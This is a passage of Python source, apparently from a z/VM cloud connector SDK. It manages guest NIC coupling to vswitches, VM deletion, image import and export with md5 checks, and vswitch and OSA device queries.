LOG.warning("Device %s of guest %s is not " "network adapter" % (vdev, userid)) return except exception.SDKSMTRequestFailed as err: emsg = err.format_message() ignored_msg = ('Device %s does not exist' % vdev.zfill(4).upper()) if (emsg.__contains__(ignored_msg)): LOG.warning("Virtual device %s does not exist for " "active guest %s" % (vdev, userid)) return else: raise else: return else: # Device hasnot be removed from user direct, # check whether it is related to a dedicated OSA device if ((vdev_info["comments"] is not None) and (vdev_info["comments"].__contains__('OSA='))): self._undedicate_nic(userid, vdev, active=active) return msg = ('Start to delete nic device %(vdev)s for guest %(vm)s' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) if vdev_exist: rd = ' '.join(( "SMAPI %s API Virtual_Network_Adapter_Delete_DM" % userid, "--operands", '-v %s' % vdev)) try: self._request(rd) except exception.SDKSMTRequestFailed as err: results = err.results emsg = err.format_message() if ((results['rc'] == 404) and (results['rs'] == 8)): LOG.warning("Virtual device %s does not exist in " "the guest's user direct", vdev) else: LOG.error("Failed to delete nic %s for %s in " "the guest's user direct, error: %s" % (vdev, userid, emsg)) self._delete_nic_inactive_exception(err, userid, vdev) self._NetDbOperator.switch_delete_record_for_nic(userid, vdev) if active: rd = ' '.join(( "SMAPI %s API Virtual_Network_Adapter_Delete" % userid, "--operands", '-v %s' % vdev)) try: self._request(rd) except exception.SDKSMTRequestFailed as err: results = err.results emsg = err.format_message() if ((results['rc'] == 204) and (results['rs'] == 8)): LOG.warning("Virtual device %s does not exist on " "the active guest system", vdev) else: LOG.error("Failed to delete nic %s for %s on " "the active guest system, error: %s" % (vdev, userid, emsg)) self._delete_nic_active_exception(err, userid, vdev) msg = ('Delete nic device %(vdev)s for guest %(vm)s successfully' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) def _couple_active_exception(self, error, userid, vdev, vswitch): if ((error.results['rc'] == 212) and ((error.results['rs'] == 28) or (error.results['rs'] == 8))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=10, vdev=vdev, userid=userid, vsw=vswitch, msg=errmsg) elif ((error.results['rc'] == 212) and (error.results['rs'] == 40)): obj_desc = "Vswitch %s" % vswitch raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 204) and (error.results['rs'] == 8)): obj_desc = "Guest device %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 396) and ((error.results['rs'] == 2788) or (error.results['rs'] == 2848) or (error.results['rs'] == 3034) or (error.results['rs'] == 6011))): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=10, vdev=vdev, userid=userid, vsw=vswitch, msg=errmsg) else: raise error def _couple_inactive_exception(self, error, userid, vdev, vswitch): if ((error.results['rc'] == 412) and (error.results['rs'] == 28)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=10, vdev=vdev, userid=userid, vsw=vswitch, msg=errmsg) elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=11, vdev=vdev, userid=userid, vsw=vswitch, obj=obj_desc) elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)): 
obj_desc = "Guest %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)): obj_desc = "Guest device %s" % vdev raise exception.SDKConflictError(modID='network', rs=11, vdev=vdev, userid=userid, vsw=vswitch, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 8)): obj_desc = "Guest device %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') else: raise error def _couple_nic(self, userid, vdev, vswitch_name, active=False): """Couple NIC to vswitch by adding vswitch into user direct.""" if active: self._is_active(userid) msg = ('Start to couple nic device %(vdev)s of guest %(vm)s ' 'with vswitch %(vsw)s' % {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name}) LOG.info(msg) requestData = ' '.join(( 'SMAPI %s' % userid, "API Virtual_Network_Adapter_Connect_Vswitch_DM", "--operands", "-v %s" % vdev, "-n %s" % vswitch_name)) try: self._request(requestData) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to couple nic %s to vswitch %s for user %s " "in the guest's user direct, error: %s" % (vdev, vswitch_name, userid, err.format_message())) self._couple_inactive_exception(err, userid, vdev, vswitch_name) # the inst must be active, or this call will failed if active: requestData = ' '.join(( 'SMAPI %s' % userid, 'API Virtual_Network_Adapter_Connect_Vswitch', "--operands", "-v %s" % vdev, "-n %s" % vswitch_name)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err1: results1 = err1.results msg1 = err1.format_message() if ((results1 is not None) and (results1['rc'] == 204) and (results1['rs'] == 20)): LOG.warning("Virtual device %s already connected " "on the active guest system", vdev) else: persist_OK = True requestData = ' '.join(( 'SMAPI %s' % userid, 'API Virtual_Network_Adapter_Disconnect_DM', "--operands", '-v %s' % vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err2: results2 = err2.results msg2 = err2.format_message() if ((results2 is not None) and (results2['rc'] == 212) and (results2['rs'] == 32)): persist_OK = True else: persist_OK = False if persist_OK: self._couple_active_exception(err1, userid, vdev, vswitch_name) else: raise exception.SDKNetworkOperationError(rs=3, nic=vdev, vswitch=vswitch_name, couple_err=msg1, revoke_err=msg2) """Update information in switch table.""" self._NetDbOperator.switch_update_record_with_switch(userid, vdev, vswitch_name) msg = ('Couple nic device %(vdev)s of guest %(vm)s ' 'with vswitch %(vsw)s successfully' % {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name}) LOG.info(msg) def couple_nic_to_vswitch(self, userid, nic_vdev, vswitch_name, active=False): """Couple nic to vswitch.""" if active: msg = ("both in the user direct of guest %s and on " "the active guest system" % userid) else: msg = "in the user direct of guest %s" % userid LOG.debug("Connect nic %s to switch %s %s", nic_vdev, vswitch_name, msg) self._couple_nic(userid, nic_vdev, vswitch_name, active=active) def _uncouple_active_exception(self, error, userid, vdev): if ((error.results['rc'] == 204) and (error.results['rs'] == 8)): obj_desc = "Guest device %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 204) and (error.results['rs'] == 28)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=12, vdev=vdev, userid=userid, 
msg=errmsg) else: raise error def _uncouple_inactive_exception(self, error, userid, vdev): if ((error.results['rc'] == 404) and (error.results['rs'] == 8)): obj_desc = "Guest device %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)): obj_desc = "Guest %s" % vdev raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=13, vdev=vdev, userid=userid, obj=obj_desc) else: raise error def _uncouple_nic(self, userid, vdev, active=False): """Uncouple NIC from vswitch""" if active: self._is_active(userid) msg = ('Start to uncouple nic device %(vdev)s of guest %(vm)s' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) requestData = ' '.join(( 'SMAPI %s' % userid, "API Virtual_Network_Adapter_Disconnect_DM", "--operands", "-v %s" % vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: results = err.results emsg = err.format_message() if ((results is not None) and (results['rc'] == 212) and (results['rs'] == 32)): LOG.warning("Virtual device %s is already disconnected " "in the guest's user direct", vdev) else: LOG.error("Failed to uncouple nic %s in the guest's user " "direct, error: %s" % (vdev, emsg)) self._uncouple_inactive_exception(err, userid, vdev) """Update information in switch table.""" self._NetDbOperator.switch_update_record_with_switch(userid, vdev, None) # the inst must be active, or this call will failed if active: requestData = ' '.join(( 'SMAPI %s' % userid, 'API Virtual_Network_Adapter_Disconnect', "--operands", "-v %s" % vdev)) try: self._request(requestData) except (exception.SDKSMTRequestFailed, exception.SDKInternalError) as err: results = err.results emsg = err.format_message() if ((results is not None) and (results['rc'] == 204) and (results['rs'] == 48)): LOG.warning("Virtual device %s is already " "disconnected on the active " "guest system", vdev) else: LOG.error("Failed to uncouple nic %s on the active " "guest system, error: %s" % (vdev, emsg)) self._uncouple_active_exception(err, userid, vdev) msg = ('Uncouple nic device %(vdev)s of guest %(vm)s successfully' % {'vdev': vdev, 'vm': userid}) LOG.info(msg) def uncouple_nic_from_vswitch(self, userid, nic_vdev, active=False): if active: msg = ("both in the user direct of guest %s and on " "the active guest system" % userid) else: msg = "in the user direct of guest %s" % userid LOG.debug("Disconnect nic %s with network %s", nic_vdev, msg) self._uncouple_nic(userid, nic_vdev, active=active) def delete_userid(self, userid): rd = ' '.join(('deletevm', userid, 'directory')) try: self._request(rd) except exception.SDKSMTRequestFailed as err: if err.results['rc'] == 400 and err.results['rs'] == 4: # guest vm definition not found LOG.debug("The guest %s does not exist." 
% userid) return else: msg = "SMT error: %s" % err.format_message() raise exception.SDKSMTRequestFailed(err.results, msg) def delete_vm(self, userid): self.delete_userid(userid) # revoke userid from vswitch action = "revoke id %s authority from vswitch" % userid with zvmutils.log_and_reraise_sdkbase_error(action): switch_info = self._NetDbOperator.switch_select_record_for_userid( userid) switch_list = set() for item in switch_info: switch_list.add(item['switch']) for item in switch_list: if item is not None: self.revoke_user_from_vswitch(item, userid) # cleanup db record from network table action = "delete network record for user %s" % userid with zvmutils.log_and_reraise_sdkbase_error(action): self._NetDbOperator.switch_delete_record_for_userid(userid) # TODO: cleanup db record from volume table pass # cleanup persistent folder for guest self._pathutils.remove_guest_path(userid) # cleanup db record from guest table action = "delete guest %s from database" % userid with zvmutils.log_and_reraise_sdkbase_error(action): self._GuestDbOperator.delete_guest_by_userid(userid) def execute_cmd(self, userid, cmdStr): """"cmdVM.""" requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\'' with zvmutils.log_and_reraise_smt_request_failed(action='execute ' 'command on vm via iucv channel'): results = self._request(requestData) ret = results['response'] return ret def execute_cmd_direct(self, userid, cmdStr): """"cmdVM.""" requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\'' results = self._smt.request(requestData) return results def image_import(self, image_name, url, image_meta, remote_host=None): """Import the image specified in url to SDK image repository, and create a record in image db, the imported images are located in image_repository/prov_method/os_version/image_name/, for example, /opt/sdk/images/netboot/rhel7.2/90685d2b-167bimage/0100""" image_info = [] try: image_info = self._ImageDbOperator.image_query_record(image_name) except exception.SDKObjectNotExistError: msg = ("The image record %s doens't exist in SDK image datebase," " will import the image and create record now" % image_name) LOG.info(msg) # Ensure the specified image is not exist in image DB if image_info: msg = ("The image name %s has already exist in SDK image " "database, please check if they are same image or consider" " to use a different image name for import" % image_name) LOG.error(msg) raise exception.SDKImageOperationError(rs=13, img=image_name) try: image_os_version = image_meta['os_version'].lower() target_folder = self._pathutils.create_import_image_repository( image_os_version, const.IMAGE_TYPE['DEPLOY'], image_name) except Exception as err: msg = ('Failed to create repository to store image %(img)s with ' 'error: %(err)s, please make sure there are enough space ' 'on zvmsdk server and proper permission to create the ' 'repository' % {'img': image_name, 'err': six.text_type(err)}) LOG.error(msg) raise exception.SDKImageOperationError(rs=14, msg=msg) try: import_image_fn = urlparse.urlparse(url).path.split('/')[-1] import_image_fpath = '/'.join([target_folder, import_image_fn]) self._scheme2backend(urlparse.urlparse(url).scheme).image_import( image_name, url, import_image_fpath, remote_host=remote_host) # Check md5 after import to ensure import a correct image # TODO change to use query image name in DB expect_md5sum = image_meta.get('md5sum') real_md5sum = self._get_md5sum(import_image_fpath) if expect_md5sum and expect_md5sum != real_md5sum: msg = ("The md5sum after import is not same as source image," " 
the image has been broken") LOG.error(msg) raise exception.SDKImageOperationError(rs=4) # After import to image repository, figure out whether the image type is # single disk or multiple disk; if it is a multiple-disk image, # extract it, if it is a single-disk image, rename it to be the same as the # specific vdev # TODO: (nafei) use sub-function to check the image type image_type = 'rootonly' if image_type == 'rootonly': final_image_fpath = '/'.join([target_folder, CONF.zvm.user_root_vdev]) os.rename(import_image_fpath, final_image_fpath) elif image_type == 'alldisks': # For multiple disks image, extract it, after extract, the # content under image folder is like: 0100, 0101, 0102 # and remove the image file 0100-0101-0102.tgz pass # TODO: put multiple disk image into consideration, update the # disk_size_units and image_size db field disk_size_units = self._get_disk_size_units(final_image_fpath) image_size = self._get_image_size(final_image_fpath) # TODO: update the real_md5sum field to include each disk image self._ImageDbOperator.image_add_record(image_name, image_os_version, real_md5sum, disk_size_units, image_size, image_type) LOG.info("Image %s is imported successfully" % image_name) except Exception: # Cleanup the image from image repository self._pathutils.clean_temp_folder(target_folder) raise def image_export(self, image_name, dest_url, remote_host=None): """Export the specific image to remote host or local file system :param image_name: image name that can uniquely identify an image :param dest_url: the location to store the exported image, eg. /opt/images, the image will be stored in folder /opt/images/ :param remote_host: the server that the image is exported to, the format is username@IP eg. nova@192.168.99.1, if remote_host is None, it means the image will be stored in local server :returns a dictionary that contains the exported image info { 'image_name': the image_name that was exported 'image_path': the image_path after export 'os_version': the os version of the exported image 'md5sum': the md5sum of the original image } """ image_info = self._ImageDbOperator.image_query_record(image_name) if not image_info: msg = ("The image %s does not exist in image repository" % image_name) LOG.error(msg) raise exception.SDKImageOperationError(rs=20, img=image_name) image_type = image_info[0]['type'] # TODO: (nafei) according to image_type, detect image exported path # For multiple disk image, make the tgz first, then specify the # source_path to be something like: 0100-0101-0102.tgz if image_type == 'rootonly': source_path = '/'.join([CONF.image.sdk_image_repository, const.IMAGE_TYPE['DEPLOY'], image_info[0]['imageosdistro'], image_name, CONF.zvm.user_root_vdev]) else: pass self._scheme2backend(urlparse.urlparse(dest_url).scheme).image_export( source_path, dest_url, remote_host=remote_host) # TODO: (nafei) for multiple disks image, update the expect_dict # to be the tgz's md5sum export_dict = {'image_name': image_name, 'image_path': dest_url, 'os_version': image_info[0]['imageosdistro'], 'md5sum': image_info[0]['md5sum']} LOG.info("Image %s exported successfully" % image_name) return export_dict def _get_image_disk_size_units(self, image_path): """ Return a comma separated string to indicate the image disk size and units for each image disk file under image_path For a single disk image, it looks like: 0100=3338:CYL For a multiple disk image, it looks like: 0100=3338:CYL,0101=4194200:BLK, 0102=4370:CYL""" pass def _get_disk_size_units(self, image_path): command = 'hexdump -n 48 -C %s' % image_path (rc, output) = 
zvmutils.execute(command) LOG.debug("hexdump result is %s" % output) if rc: msg = ("Error happened when executing command hexdump with" "reason: %s" % output) LOG.error(msg) raise exception.SDKImageOperationError(rs=5) try: root_disk_size = int(output[144:156]) disk_units = output[220:223] root_disk_units = ':'.join([str(root_disk_size), disk_units]) except ValueError: msg = ("Image file at %s is missing built-in disk size " "metadata, it was probably not captured by SDK" % image_path) LOG.error(msg) raise exception.SDKImageOperationError(rs=6) if 'FBA' not in output and 'CKD' not in output: raise exception.SDKImageOperationError(rs=7) LOG.debug("The image's root_disk_units is %s" % root_disk_units) return root_disk_units def _get_image_size(self, image_path): """Return disk size in bytes""" command = 'du -b %s' % image_path (rc, output) = zvmutils.execute(command) if rc: msg = ("Error happened when executing command du -b with" "reason: %s" % output) LOG.error(msg) raise exception.SDKImageOperationError(rs=8) size = output.split()[0] return size def _get_image_path_by_name(self, image_name): try: target_info = self._ImageDbOperator.image_query_record(image_name) except exception.SDKObjectNotExistError: msg = ("The image %s does not exist in image repository" % image_name) LOG.error(msg) raise exception.SDKImageOperationError(rs=20, img=image_name) # TODO: (nafei) Handle multiple disks image deploy image_path = '/'.join([CONF.image.sdk_image_repository, const.IMAGE_TYPE['DEPLOY'], target_info[0]['imageosdistro'], image_name]) return image_path def _scheme2backend(self, scheme): try: return { "file": FilesystemBackend, "http": HTTPBackend, # "https": HTTPSBackend }[scheme] except KeyError: msg = ("No backend found for '%s'" % scheme) LOG.error(msg) raise exception.SDKImageOperationError(rs=2, schema=scheme) def _get_md5sum(self, fpath): """Calculate the md5sum of the specific image file""" try: current_md5 = hashlib.md5() if isinstance(fpath, six.string_types) and os.path.exists(fpath): with open(fpath, "rb") as fh: for chunk in self._read_chunks(fh): current_md5.update(chunk) elif (fpath.__class__.__name__ in ["StringIO", "StringO"] or isinstance(fpath, IOBase)): for chunk in self._read_chunks(fpath): current_md5.update(chunk) else: return "" return current_md5.hexdigest() except Exception: msg = ("Failed to calculate the image's md5sum") LOG.error(msg) raise exception.SDKImageOperationError(rs=3) def _read_chunks(self, fh): fh.seek(0) chunk = fh.read(CHUNKSIZE) while chunk: yield chunk chunk = fh.read(CHUNKSIZE) else: fh.seek(0) def image_delete(self, image_name): # Delete image file try: self._delete_image_file(image_name) # Delete image record from db self._ImageDbOperator.image_delete_record(image_name) except exception.SDKImageOperationError as err: results = err.results if ((results['rc'] == 300) and (results['rs'] == 20)): LOG.warning("Image %s does not exist", image_name) return else: LOG.error("Failed to delete image %s, error: %s" % (image_name, err.format_message())) raise msg = ('Delete image %s successfully' % image_name) LOG.info(msg) def _delete_image_file(self, image_name): image_path = self._get_image_path_by_name(image_name) self._pathutils.clean_temp_folder(image_path) def image_query(self, imagename=None): return self._ImageDbOperator.image_query_record(imagename) def image_get_root_disk_size(self, image_name): """Return the root disk units of the specified image image_name: the unique image name in db Return the disk units in format like 3339:CYL or 467200:BLK """ 
image_info = self.image_query(image_name) if not image_info: raise exception.SDKImageOperationError(rs=20, img=image_name) disk_size_units = image_info[0]['disk_size_units'].split(':')[0] return disk_size_units def image_get_os_distro(self, image_name): """ Return the operating system distro of the specified image """ image_info = self.image_query(image_name) if not image_info: raise exception.SDKImageOperationError(rs=20, img=image_name) os_distro = image_info[0]['imageosdistro'] return os_distro def _get_image_disk_type(self, image_name): """ Return image disk type """ image_info = self.image_query(image_name) if ((image_info[0]['comments'] is not None) and (image_info[0]['comments'].__contains__('disk_type'))): image_disk_type = eval(image_info[0]['comments'])['disk_type'] if image_disk_type == 'DASD': return 'ECKD' elif image_disk_type == 'SCSI': return 'SCSI' else: return None else: return None def punch_file(self, userid, fn, fclass): rd = ("changevm %(uid)s punchfile %(file)s --class %(class)s" % {'uid': userid, 'file': fn, 'class': fclass}) try: self._request(rd) except exception.SDKSMTRequestFailed as err: LOG.error("Failed to punch file to userid '%s'," "error: %s" % (userid, err.format_message())) raise finally: os.remove(fn) def get_guest_connection_status(self, userid): '''Get guest vm connection status.''' rd = ' '.join(('getvm', userid, 'isreachable')) results = self._request(rd) if results['rs'] == 1: return True else: return False def _generate_disk_parmline(self, vdev, fmt, mntdir): parms = [ 'action=' + 'addMdisk', 'vaddr=' + vdev, 'filesys=' + fmt, 'mntdir=' + mntdir ] parmline = ' '.join(parms) parmstr = "'" + parmline + "'" return parmstr def process_additional_minidisks(self, userid, disk_info): '''Generate and punch the scripts used to process additional disk into target vm's reader. 
''' for idx, disk in enumerate(disk_info): vdev = disk.get('vdev') or self.generate_disk_vdev( offset = (idx + 1)) fmt = disk.get('format') mount_dir = disk.get('mntdir') or ''.join(['/mnt/ephemeral', str(vdev)]) disk_parms = self._generate_disk_parmline(vdev, fmt, mount_dir) func_name = '/var/lib/zvmsdk/setupDisk' self.aemod_handler(userid, func_name, disk_parms) # trigger do-script if self.get_power_state(userid) == 'on': self.execute_cmd(userid, "/usr/bin/zvmguestconfigure start") def aemod_handler(self, instance_name, func_name, parms): rd = ' '.join(['changevm', instance_name, 'aemod', func_name, '--invparms', parms]) action = parms[0] + instance_name with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def get_user_console_output(self, userid): # get console into reader rd = 'getvm %s consoleoutput' % userid action = 'get console log reader file list for guest vm: %s' % userid with zvmutils.log_and_reraise_smt_request_failed(action): resp = self._request(rd) with zvmutils.expect_invalid_resp_data(resp): rf_list = resp['response'][0].rpartition(':')[2].strip().split() # TODO: make sure reader device is online # via 'cat /sys/bus/ccw/drivers/vmur/0.0.000c/online' # 'sudo /sbin/cio_ignore -r 000c; sudo /sbin/chccwdev -e 000c' # 'which udevadm &> /dev/null && udevadm settle || udevsettle' logs = [] for rf in rf_list: cmd = 'sudo /usr/sbin/vmur re -t -O %s' % rf rc, output = zvmutils.execute(cmd) if rc == 0: logs.append(output) return ''.join(logs) def query_vswitch(self, switch_name): smt_userid = zvmutils.get_smt_userid() rd = ' '.join(( "SMAPI %s API Virtual_Network_Vswitch_Query_Extended" % smt_userid, "--operands", '-k switch_name=%s' % switch_name )) try: results = self._request(rd) rd_list = results['response'] except exception.SDKSMTRequestFailed as err: if ((err.results['rc'] == 212) and (err.results['rs'] == 40)): msg = 'Vswitch %s does not exist' % switch_name LOG.error(msg) obj_desc = "Vswitch %s" % switch_name raise exception.SDKObjectNotExistError(obj_desc=obj_desc, modID='network') else: action = "query vswitch details info" msg = "Failed to %s. 
" % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) vsw_info = {} with zvmutils.expect_invalid_resp_data(): # ignore user_vlan_id part and jump to the vswitch basic info idx_end = len(rd_list) idx = 0 while((idx < idx_end) and not rd_list[idx].__contains__('switch_name')): idx = idx + 1 # The next 21 lines contains the vswitch basic info # eg, name, type, port_type, vlan_awareness, etc for i in range(21): rd = rd_list[idx + i].split(':') vsw_info[rd[0].strip()] = rd[1].strip() idx = idx + 21 # Skip the vepa_status while((idx < idx_end) and not rd_list[idx].__contains__('real_device_address') and not rd_list[idx].__contains__('port_num') and not rd_list[idx].__contains__('adapter_owner')): idx = idx + 1 def _parse_value(data_list, idx, keyword, offset=1): value = data_list[idx].rpartition(keyword)[2].strip() if value == '(NONE)': value = 'NONE' return idx + offset, value def _parse_dev_status(value): if value in const.DEV_STATUS.keys(): return const.DEV_STATUS[value] else: return 'Unknown' def _parse_dev_err(value): if value in const.DEV_ERROR.keys(): return const.DEV_ERROR[value] else: return 'Unknown' # Start to analyse the real devices info vsw_info['real_devices'] = {} while((idx < idx_end) and rd_list[idx].__contains__('real_device_address')): # each rdev has 6 lines' info idx, rdev_addr = _parse_value(rd_list, idx, 'real_device_address: ') idx, vdev_addr = _parse_value(rd_list, idx, 'virtual_device_address: ') idx, controller = _parse_value(rd_list, idx, 'controller_name: ') idx, port_name = _parse_value(rd_list, idx, 'port_name: ') idx, dev_status = _parse_value(rd_list, idx, 'device_status: ') idx, dev_err = _parse_value(rd_list, idx, 'device_error_status ') vsw_info['real_devices'][rdev_addr] = {'vdev': vdev_addr, 'controller': controller, 'port_name': port_name, 'dev_status': _parse_dev_status( dev_status), 'dev_err': _parse_dev_err( dev_err) } # Under some case there would be an error line in the output # "Error controller_name is NULL!!", skip this line if ((idx < idx_end) and rd_list[idx].__contains__( 'Error controller_name is NULL!!')): idx += 1 # Start to get the authorized userids vsw_info['authorized_users'] = {} while((idx < idx_end) and rd_list[idx].__contains__('port_num')): # each authorized userid has 6 lines' info at least idx, port_num = _parse_value(rd_list, idx, 'port_num: ') idx, userid = _parse_value(rd_list, idx, 'grant_userid: ') idx, prom_mode = _parse_value(rd_list, idx, 'promiscuous_mode: ') idx, osd_sim = _parse_value(rd_list, idx, 'osd_sim: ') idx, vlan_count = _parse_value(rd_list, idx, 'vlan_count: ') vlan_ids = [] for i in range(int(vlan_count)): idx, id = _parse_value(rd_list, idx, 'user_vlan_id: ') vlan_ids.append(id) # For vlan unaware vswitch, the query smcli would # return vlan_count as 1, here we just set the count to 0 if (vsw_info['vlan_awareness'] == 'UNAWARE'): vlan_count = 0 vlan_ids = [] vsw_info['authorized_users'][userid] = { 'port_num': port_num, 'prom_mode': prom_mode, 'osd_sim': osd_sim, 'vlan_count': vlan_count, 'vlan_ids': vlan_ids } # Start to get the connected adapters info # OWNER_VDEV would be used as the dict key for each adapter vsw_info['adapters'] = {} while((idx < idx_end) and rd_list[idx].__contains__('adapter_owner')): # each adapter has four line info: owner, vdev, macaddr, type idx, owner = _parse_value(rd_list, idx, 'adapter_owner: ') idx, vdev = _parse_value(rd_list, idx, 'adapter_vdev: ') idx, mac = _parse_value(rd_list, idx, 'adapter_macaddr: 
') idx, type = _parse_value(rd_list, idx, 'adapter_type: ') key = owner + '_' + vdev vsw_info['adapters'][key] = { 'mac': mac, 'type': type } # Todo: analyze and add the uplink NIC info and global member info def _parse_switch_status(value): if value in const.SWITCH_STATUS.keys(): return const.SWITCH_STATUS[value] else: return 'Unknown' if 'switch_status' in vsw_info.keys(): vsw_info['switch_status'] = _parse_switch_status( vsw_info['switch_status']) return vsw_info def get_nic_info(self, userid=None, nic_id=None, vswitch=None): nic_info = self._NetDbOperator.switch_select_record(userid=userid, nic_id=nic_id, vswitch=vswitch) return nic_info def is_first_network_config(self, userid): action = "get guest '%s' to database" % userid with zvmutils.log_and_reraise_sdkbase_error(action): info = self._GuestDbOperator.get_guest_by_userid(userid) # check net_set if int(info[3]) == 0: return True else: return False def update_guestdb_with_net_set(self, userid): action = "update guest '%s' in database" % userid with zvmutils.log_and_reraise_sdkbase_error(action): self._GuestDbOperator.update_guest_by_userid(userid, net_set='1') def _is_OSA_free(self, OSA_device): osa_info = self._query_OSA() if 'OSA' not in osa_info.keys(): return False elif len(osa_info['OSA']['FREE']) == 0: return False else: dev1 = str(OSA_device).zfill(4).upper() dev2 = str(str(hex(int(OSA_device, 16) + 1))[2:]).zfill(4).upper() dev3 = str(str(hex(int(OSA_device, 16) + 2))[2:]).zfill(4).upper() if ((dev1 in osa_info['OSA']['FREE']) and (dev2 in osa_info['OSA']['FREE']) and (dev3 in osa_info['OSA']['FREE'])): return True else: return False def _query_OSA(self): smt_userid = zvmutils.get_smt_userid() rd = "SMAPI %s API Virtual_Network_OSA_Query" % smt_userid OSA_info = {} try: results = self._request(rd) rd_list = results['response'] except exception.SDKSMTRequestFailed as err: if ((err.results['rc'] == 4) and (err.results['rs'] == 4)): msg = 'No OSAs on system' LOG.info(msg) return OSA_info else: action = "query OSA details info" msg = "Failed to %s. 
" % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) with zvmutils.expect_invalid_resp_data(): idx_end = len(rd_list) idx = 0 def _parse_value(data_list, idx, keyword, offset=1): value = data_list[idx].rpartition(keyword)[2].strip() return idx + offset, value # Start to analyse the osa devices info while((idx < idx_end) and rd_list[idx].__contains__('OSA Address')): idx, osa_addr = _parse_value(rd_list, idx, 'OSA Address: ') idx, osa_status = _parse_value(rd_list, idx, 'OSA Status: ') idx, osa_type = _parse_value(rd_list, idx, 'OSA Type: ') if osa_type != 'UNKNOWN': idx, CHPID_addr = _parse_value(rd_list, idx, 'CHPID Address: ') idx, Agent_status = _parse_value(rd_list, idx, 'Agent Status: ') if osa_type not in OSA_info.keys(): OSA_info[osa_type] = {} OSA_info[osa_type]['FREE'] = [] OSA_info[osa_type]['BOXED'] = [] OSA_info[osa_type]['OFFLINE'] = [] OSA_info[osa_type]['ATTACHED'] = [] if osa_status.__contains__('ATT'): id = osa_status.split()[1] item = (id, osa_addr) OSA_info[osa_type]['ATTACHED'].append(item) else: OSA_info[osa_type][osa_status].append(osa_addr) return OSA_info def _get_available_vdev(self, userid, vdev=None): ports_info = self._NetDbOperator.switch_select_table() vdev_info = [] for p in ports_info: if p['userid'] == userid.upper(): vdev_info.append(p['interface']) if len(vdev_info) == 0: # no nic defined for the guest if vdev is None: nic_vdev = CONF.zvm.default_nic_vdev else: nic_vdev = vdev else: if vdev is None: used_vdev = max(vdev_info) nic_vdev = str(hex(int(used_vdev, 16) + 3))[2:] else: if self._is_vdev_valid(vdev, vdev_info): nic_vdev = vdev else: errmsg = ("The specified virtual device number %s " "has already been used." % vdev) raise exception.SDKConflictError(modID='network', rs=6, vdev=vdev, userid=userid, msg=errmsg) if ((len(nic_vdev) > 4) or (len(str(hex(int(nic_vdev, 16) + 2))[2:]) > 4)): errmsg = ("Virtual device number %s is not valid" % nic_vdev) raise exception.SDKInvalidInputFormat(msg=errmsg) return nic_vdev def dedicate_OSA(self, userid, OSA_device, vdev=None, active=False): nic_vdev = self._get_available_vdev(userid, vdev=vdev) if not self._is_OSA_free(OSA_device): errmsg = ("The specified OSA device number %s " "is not free" % OSA_device) raise exception.SDKConflictError(modID='network', rs=14, osa=OSA_device, userid=userid, msg=errmsg) LOG.debug('Nic attributes: vdev is %(vdev)s, ' 'dedicated OSA device is %(osa)s', {'vdev': nic_vdev, 'osa': OSA_device}) self._dedicate_OSA(userid, OSA_device, nic_vdev, active=active) return nic_vdev def _dedicate_OSA_inactive_exception(self, error, userid, vdev, OSA_device): if ((error.results['rc'] == 400) and (error.results['rs'] == 12)): obj_desc = "Guest %s" % userid raise exception.SDKConflictError(modID='network', rs=15, osa=OSA_device, userid=userid, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)): obj_desc = "Guest device %s" % vdev raise exception.SDKConflictError(modID='network', rs=15, osa=OSA_device, userid=userid, obj=obj_desc) elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)): errmsg = error.format_message() raise exception.SDKConflictError(modID='network', rs=14, osa=OSA_device, userid=userid, msg=errmsg) else: raise error def _dedicate_OSA_active_exception(self, error, userid, OSA_device): if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or ((error.results['rc'] == 204) and (error.results['rs'] == 8)) or ((error.results['rc'] == 204) and 
